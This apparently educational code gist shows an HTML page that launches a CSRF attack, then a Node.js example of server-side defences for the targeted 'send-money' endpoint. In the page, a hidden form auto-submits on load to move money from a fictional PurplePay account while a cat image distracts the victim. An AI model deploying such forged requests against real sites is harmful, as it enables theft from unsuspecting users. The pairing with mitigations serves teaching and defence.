Created
August 11, 2020 02:24
A sample HTML page that can carry out CSRF attacks
<!DOCTYPE html>
<html>
  <head>
    <title>I'm a trusted page</title>
  </head>
  <!-- Immediately dispatch the form when we load -->
  <body onload="document.hackform.submit()">
    <!-- Nothing suspicious... show the user a happy cat! -->
    <img src="happycat.jpg" alt="I am a happy cat" />
    <!-- But silently, let's submit a POST request to hijack some money from the user's PurplePay -->
    <form style="display: none" name="hackform" method="POST" action="http://purplepay.com/send-money">
      <input name="name" value="Bill Gates" />
      <input name="amount" value="50" />
    </form>
  </body>
</html>
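The receiving side of this request, as an added example that is not part of the gist: the checks a `send-money` handler can apply so that the auto-submitted form above is rejected. The function names, the simplified request shape, the HMAC-based token scheme and the `https://purplepay.com` origin are all assumptions made for illustration.

```javascript
// Added example (hypothetical names throughout): server-side CSRF checks
// for the send-money endpoint targeted by the page above.
const crypto = require('crypto');

const SECRET = crypto.randomBytes(32);           // per-deployment HMAC key
const ALLOWED_ORIGIN = 'https://purplepay.com';  // assumed site origin

// Token the genuine PurplePay form embeds in a hidden field:
// an HMAC of the session id, so it is bound to one session.
function issueCsrfToken(sessionId) {
  return crypto.createHmac('sha256', SECRET).update(sessionId).digest('hex');
}

// Constant-time comparison of the submitted token with the expected one.
function tokenMatches(sessionId, token) {
  if (typeof token !== 'string') return false;
  const expected = Buffer.from(issueCsrfToken(sessionId));
  const got = Buffer.from(token);
  return got.length === expected.length && crypto.timingSafeEqual(got, expected);
}

// req is a simplified request object: { method, headers, sessionId, body }.
function checkSendMoney(req) {
  if (req.method !== 'POST') return { ok: false, reason: 'method' };
  // The browser sets Origin on form POSTs; page markup cannot override it.
  if (req.headers.origin !== ALLOWED_ORIGIN) return { ok: false, reason: 'origin' };
  // A cross-site page cannot read the victim's token, so its form carries none.
  const token = (req.body || {}).csrf_token;
  if (!tokenMatches(req.sessionId, token)) return { ok: false, reason: 'csrf_token' };
  return { ok: true, reason: null };
}

// Cookie attributes that stop the browser attaching the session cross-site.
function sessionCookie(sessionId) {
  return `session=${sessionId}; Secure; HttpOnly; SameSite=Strict; Path=/`;
}

// Constructed sample requests: the forged POST from the page above, and a genuine one.
const sid = 'constructed-session-id';
const forged = { method: 'POST', headers: { origin: 'http://attacker.example' },
  sessionId: sid, body: { name: 'Bill Gates', amount: '50' } };
const genuine = { method: 'POST', headers: { origin: ALLOWED_ORIGIN },
  sessionId: sid, body: { name: 'Alice', amount: '5', csrf_token: issueCsrfToken(sid) } };
console.log(checkSendMoney(forged), checkSendMoney(genuine));
```

The Origin check and the token check are independent layers: with `SameSite=Strict` on the session cookie the forged request would also arrive unauthenticated.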